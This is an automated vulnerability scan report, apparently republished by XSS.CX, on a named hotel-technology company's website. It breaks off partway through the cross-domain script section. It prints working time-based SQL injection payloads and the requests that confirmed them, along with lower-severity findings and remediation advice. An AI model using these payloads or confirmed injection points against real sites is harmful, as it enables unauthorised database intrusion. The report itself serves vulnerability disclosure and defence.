Report generated by XSS.CX at Tue Oct 05 16:25:59 EDT 2010.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler | MSRC Reference | GOOG Reference | CVE-2010-3486 | CVE-2010-3425
Loading

1. SQL injection

1.1. http://www.sabrehospitality.com/ [Referer HTTP header]

1.2. http://www.sabrehospitality.com/css/rss.css [REST URL parameter 2]

1.3. http://www.sabrehospitality.com/press/siteworx-and-sabre-hospitality-solutions-partner-with-mandarin-oriental-hotel-group-to-deliver-user-friendly-interactive-mobile-web-site [name of an arbitrarily supplied request parameter]

2. Cookie without HttpOnly flag set

3. Source code disclosure

4. Cross-domain POST

5. Cross-domain Referer leakage

5.1. http://www.sabrehospitality.com/

5.2. http://www.sabrehospitality.com/consortia-rfp-management.php

6. Cross-domain script include

6.1. http://www.sabrehospitality.com/

6.2. http://www.sabrehospitality.com/central-reservation-systems.php

6.3. http://www.sabrehospitality.com/consortia-rfp-management.php

6.4. http://www.sabrehospitality.com/contact-us.php

6.5. http://www.sabrehospitality.com/copyright.php

6.6. http://www.sabrehospitality.com/css/

6.7. http://www.sabrehospitality.com/electronic-distribution-systems.php

6.8. http://www.sabrehospitality.com/hospitality-careers.php

6.9. http://www.sabrehospitality.com/hospitality-consulting.php

6.10. http://www.sabrehospitality.com/hospitality-solutions-company.php

6.11. http://www.sabrehospitality.com/hospitality-solutions-results.php

6.12. http://www.sabrehospitality.com/hotel-channel-management.php

6.13. http://www.sabrehospitality.com/hotel-distribution-systems.php

6.14. http://www.sabrehospitality.com/hotel-integration-management.php

6.15. http://www.sabrehospitality.com/hotel-marketing-solutions.php

6.16. http://www.sabrehospitality.com/hotel-technology-services.php

6.17. http://www.sabrehospitality.com/images/

6.18. http://www.sabrehospitality.com/images/buttons/

6.19. http://www.sabrehospitality.com/images/inset/

6.20. http://www.sabrehospitality.com/images/layout/

6.21. http://www.sabrehospitality.com/images/rss/

6.22. http://www.sabrehospitality.com/mobile-marketing-company.php

6.23. http://www.sabrehospitality.com/press/

6.24. http://www.sabrehospitality.com/press/-sabre-hospitality-solutions-selected-by-kimpton-hotels-restaurants-for-comprehensive-marketing-and-distribution

6.25. http://www.sabrehospitality.com/press/accor-hospitality-simplifies-travel-agency-shopping-with-sabre-hospitality-solutions-direct-connectivity

6.26. http://www.sabrehospitality.com/press/award-winning-indonesian-resort-increases-online-revenue-over-200-percent-with-sabre-hospitality-solutions

6.27. http://www.sabrehospitality.com/press/cornell-universitys-statler-hotel-selects-sabre-hospitality-solutions-for-its-comprehensive-distribution-solutions

6.28. http://www.sabrehospitality.com/press/de-historiske-sees-revenue-nearly-double-since-choosing-sabre-hospitality-solutions-as-marketing-provider

6.29. http://www.sabrehospitality.com/press/fast-growing-asia-pacific-hotel-chain-park-hotel-group-switches-to-sabre-hospitality-solutions-for-distribution-expertise

6.30. http://www.sabrehospitality.com/press/hacienda-tres-ros-launches-innovative-mobile-booking-engine

6.31. http://www.sabrehospitality.com/press/increased-online-conversion-rates-lead-to-big-success-for-aqua-hotels-resorts-after-switching-to-sabre-hospitality-solutions

6.32. http://www.sabrehospitality.com/press/largest-japanese-hotel-consortium-switches-to-sabre-hospitality-solutions-as-marketing-provider

6.33. http://www.sabrehospitality.com/press/mvenpick-hotels-resorts-sets-on-new-booking-engine-guest-connect

6.34. http://www.sabrehospitality.com/press/outdoor-traveler-destinations-launches-new-brand-affiliation-program-with-sabre-hospitality-solutions-distribution-and-marketing-expertise

6.35. http://www.sabrehospitality.com/press/over-usd-95-billion-generated-in-hotel-room-revenue-as-record-numbers-of-hoteliers-select-newly-formed-sabre-hospitality-solutions-in-2009

6.36. http://www.sabrehospitality.com/press/preferred-hotel-group-selects-sabre-hospitality-solutions-as-global-marketing-and-distribution-provider

6.37. http://www.sabrehospitality.com/press/prestigious-langham-hotels-international-to-switch-to-sabre-hospitality-solutions-for-its-comprehensive-distrubution-solutions

6.38. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-and-carlson-hotels-improve-agency-booking-process-using-new-direct-connect-technology

6.39. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-becomes-the-provider-of-choice-for-hotel-chains-seeking-experience-and-results

6.40. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-helps-mamaison-hotels-and-residences-increase-online-booking-revenue-by-more-than-100-percent

6.41. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-innovative-web-site-designs-earn-dozens-of-awards-while-ensuring-results

6.42. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-renews-partnership-with-cornell-center-for-hospitality-research

6.43. http://www.sabrehospitality.com/press/sabre-president-tapped-by-us-commerce-secretary-to-encourage-tourism-to-the-united-states

6.44. http://www.sabrehospitality.com/press/shangri-la-hotels-and-resorts-renews-distribution-agreement-with-sabre-hospitality-solutions-following-significant-revenue-and-booking-growth

6.45. http://www.sabrehospitality.com/press/siteworx-and-sabre-hospitality-solutions-partner-with-mandarin-oriental-hotel-group-to-deliver-user-friendly-interactive-mobile-web-site

6.46. http://www.sabrehospitality.com/press/uk-based-hotel-group-increases-bookings-and-avergae-rate-using-sabre-hospitality-solutions-reservations-technology

6.47. http://www.sabrehospitality.com/privacy-policy.php

6.48. http://www.sabrehospitality.com/search.php

6.49. http://www.sabrehospitality.com/site-map.php

6.50. http://www.sabrehospitality.com/subscribe.php

7. Email addresses disclosed

7.1. http://www.sabrehospitality.com/contact-us.php

7.2. http://www.sabrehospitality.com/js/belated.js

7.3. http://www.sabrehospitality.com/js/modal.js

7.4. http://www.sabrehospitality.com/js/roundies.js

7.5. http://www.sabrehospitality.com/press/-sabre-hospitality-solutions-selected-by-kimpton-hotels-restaurants-for-comprehensive-marketing-and-distribution

7.6. http://www.sabrehospitality.com/press/accor-hospitality-simplifies-travel-agency-shopping-with-sabre-hospitality-solutions-direct-connectivity

7.7. http://www.sabrehospitality.com/press/award-winning-indonesian-resort-increases-online-revenue-over-200-percent-with-sabre-hospitality-solutions

7.8. http://www.sabrehospitality.com/press/cornell-universitys-statler-hotel-selects-sabre-hospitality-solutions-for-its-comprehensive-distribution-solutions

7.9. http://www.sabrehospitality.com/press/de-historiske-sees-revenue-nearly-double-since-choosing-sabre-hospitality-solutions-as-marketing-provider

7.10. http://www.sabrehospitality.com/press/fast-growing-asia-pacific-hotel-chain-park-hotel-group-switches-to-sabre-hospitality-solutions-for-distribution-expertise

7.11. http://www.sabrehospitality.com/press/largest-japanese-hotel-consortium-switches-to-sabre-hospitality-solutions-as-marketing-provider

7.12. http://www.sabrehospitality.com/press/outdoor-traveler-destinations-launches-new-brand-affiliation-program-with-sabre-hospitality-solutions-distribution-and-marketing-expertise

7.13. http://www.sabrehospitality.com/press/over-usd-95-billion-generated-in-hotel-room-revenue-as-record-numbers-of-hoteliers-select-newly-formed-sabre-hospitality-solutions-in-2009

7.14. http://www.sabrehospitality.com/press/preferred-hotel-group-selects-sabre-hospitality-solutions-as-global-marketing-and-distribution-provider

7.15. http://www.sabrehospitality.com/press/prestigious-langham-hotels-international-to-switch-to-sabre-hospitality-solutions-for-its-comprehensive-distrubution-solutions

7.16. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-and-carlson-hotels-improve-agency-booking-process-using-new-direct-connect-technology

7.17. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-becomes-the-provider-of-choice-for-hotel-chains-seeking-experience-and-results

7.18. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-innovative-web-site-designs-earn-dozens-of-awards-while-ensuring-results

7.19. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-renews-partnership-with-cornell-center-for-hospitality-research

7.20. http://www.sabrehospitality.com/press/sabre-president-tapped-by-us-commerce-secretary-to-encourage-tourism-to-the-united-states

7.21. http://www.sabrehospitality.com/press/shangri-la-hotels-and-resorts-renews-distribution-agreement-with-sabre-hospitality-solutions-following-significant-revenue-and-booking-growth

7.22. http://www.sabrehospitality.com/press/uk-based-hotel-group-increases-bookings-and-avergae-rate-using-sabre-hospitality-solutions-reservations-technology

7.23. http://www.sabrehospitality.com/privacy-policy.php

8. Robots.txt file

9. Content type incorrectly stated


1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://www.sabrehospitality.com/ [Referer HTTP header]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the Referer HTTP header. The application took 21594 milliseconds to respond to the request, compared with 1766 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET / HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=',0,0,0)waitfor%20delay'0%3a0%3a20'--
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:16:44 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13361


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <!-- cmt id="meta
...[SNIP]...
1.2. http://www.sabrehospitality.com/css/rss.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /css/rss.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2. The application took 23312 milliseconds to respond to the request, compared with 156 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /css/rss.css',0)waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/css/rss.xsl
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 404 Not Found
Date: Tue, 05 Oct 2010 19:20:27 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11395


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
1.3. http://www.sabrehospitality.com/press/siteworx-and-sabre-hospitality-solutions-partner-with-mandarin-oriental-hotel-group-to-deliver-user-friendly-interactive-mobile-web-site [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/siteworx-and-sabre-hospitality-solutions-partner-with-mandarin-oriental-hotel-group-to-deliver-user-friendly-interactive-mobile-web-site

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 67921 milliseconds to respond to the request, compared with 11625 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /press/siteworx-and-sabre-hospitality-solutions-partner-with-mandarin-oriental-hotel-group-to-deliver-user-friendly-interactive-mobile-web-site?1')waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:54:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25799


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
2. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sabrehospitality.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /?esiteurl=sabrehospitalitysolutions.com HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.sabre.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sabrehospitality.com

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 16:06:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13361


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <!-- cmt id="meta
...[SNIP]...
3. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.sabrehospitality.com
Path:   /js/roundies.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /js/roundies.js HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 18:59:13 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 02 Jan 2009 03:19:06 GMT
ETag: "27cbd7-20ed-6751be80"
Accept-Ranges: bytes
Content-Length: 8429
Connection: close
Content-Type: application/x-javascript

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.d
...[SNIP]...
eturn p}('t K={16:\'K\',1L:G,1M:G,1d:G,2f:y(){u(D.2g!=8&&D.1N&&!D.1N[q.16]){q.1L=M;q.1M=M}17 u(D.2g==8){q.1d=M}},2h:D.2i,1O:[],1b:{},2j:y(){u(q.1L||q.1M){D.1N.2L(q.16,\'2M:2N-2O-2P:x\')}u(q.1d){D.2Q(\'<?2R 2S="\'+q.16+\'" 2T="#1P#2k" ?>\')}},2l:y(){t a=D.1k(\'z\');D.2m.1w.1Q(a,D.2m.1w.1w);u(a.12){2n{t b=a.12;b.1x(q.16+\'\\\\:*\',\'{1l:2U(#1P#2k)}\');q.12=b}2o(2p){}}17{q.12=a}},1x:y(a,b,c){u(1R b==\'1S\'||b===2V){b=0}u(b.2W.2q().1y(\'
...[SNIP]...
4. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /contact-us.php

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /contact-us.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:14:12 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36846


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<!-- /cmt-->                
               <form action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=utf-8" method="post" class="validate standard" id="contact-us">
<input type=hidden name="oid" value="00D300000000A4i">
...[SNIP]...
5. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

5.1. http://www.sabrehospitality.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?esiteurl=sabrehospitalitysolutions.com HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.sabre.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sabrehospitality.com

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 16:06:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13361


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <!-- cmt id="meta
...[SNIP]...
</h3>

<a href="http://www.sabretravelnetwork.com/home/products_services/products/sabre_hotel_rfp_corporations" class="btn-inline-corp" target="_blank"></a>
<a href="http://www.sabretravelnetwork.com/home/products_services/products/sabre_hotel_rfp_agencies/" class="btn-inline-tmc" target="_blank"></a>
...[SNIP]...
<li id="utility-sabre"><a href="http://sabre-holdings.com/">Sabre Holdings</a>
...[SNIP]...
<li id="follow-twitter"><a href="http://twitter.com/SabreHosp" class="track" name="follow:twitter" target="_blank"><span class="alt">
...[SNIP]...
<li id="follow-linked"><a target="_blank" href="http://www.linkedin.com/companies/sabre-hospitality-solutions" class="track" name="follow:linkedin"><span class="alt">
...[SNIP]...
</strong> While using our site, you may encounter some trouble along the way. For PC users, we recommend upgrading to the latest version of <a href="http://www.microsoft.com/windows/products/winfamily/ie/default.mspx" rel="nofollow">Internet Explorer</a> or <a href="http://www.mozilla.com/en-US/firefox/" rel="nofollow">Firefox</a>. For Mac users, we recommend the latest version of <a href="http://www.apple.com/macosx/features/safari/" rel="nofollow">Safari</a> or <a href="http://www.mozilla.com/en-US/firefox/" rel="nofollow">Firefox</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
5.2. http://www.sabrehospitality.com/consortia-rfp-management.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /consortia-rfp-management.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /consortia-rfp-management.php?h=true HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:13:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15151


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<li id="utility-sabre"><a href="http://sabre-holdings.com/">Sabre Holdings</a>
...[SNIP]...
<li id="follow-twitter"><a href="http://twitter.com/SabreHosp" class="track" name="follow:twitter" target="_blank"><span class="alt">
...[SNIP]...
<li id="follow-linked"><a target="_blank" href="http://www.linkedin.com/companies/sabre-hospitality-solutions" class="track" name="follow:linkedin"><span class="alt">
...[SNIP]...
</strong> While using our site, you may encounter some trouble along the way. For PC users, we recommend upgrading to the latest version of <a href="http://www.microsoft.com/windows/products/winfamily/ie/default.mspx" rel="nofollow">Internet Explorer</a> or <a href="http://www.mozilla.com/en-US/firefox/" rel="nofollow">Firefox</a>. For Mac users, we recommend the latest version of <a href="http://www.apple.com/macosx/features/safari/" rel="nofollow">Safari</a> or <a href="http://www.mozilla.com/en-US/firefox/" rel="nofollow">Firefox</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6. Cross-domain script include  previous  next
There are 50 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

6.1. http://www.sabrehospitality.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?esiteurl=sabrehospitalitysolutions.com HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.sabre.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sabrehospitality.com

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 16:06:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13361


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <!-- cmt id="meta
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.2. http://www.sabrehospitality.com/central-reservation-systems.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /central-reservation-systems.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /central-reservation-systems.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/consortia-rfp-management.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:19:01 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13856


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.3. http://www.sabrehospitality.com/consortia-rfp-management.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /consortia-rfp-management.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /consortia-rfp-management.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
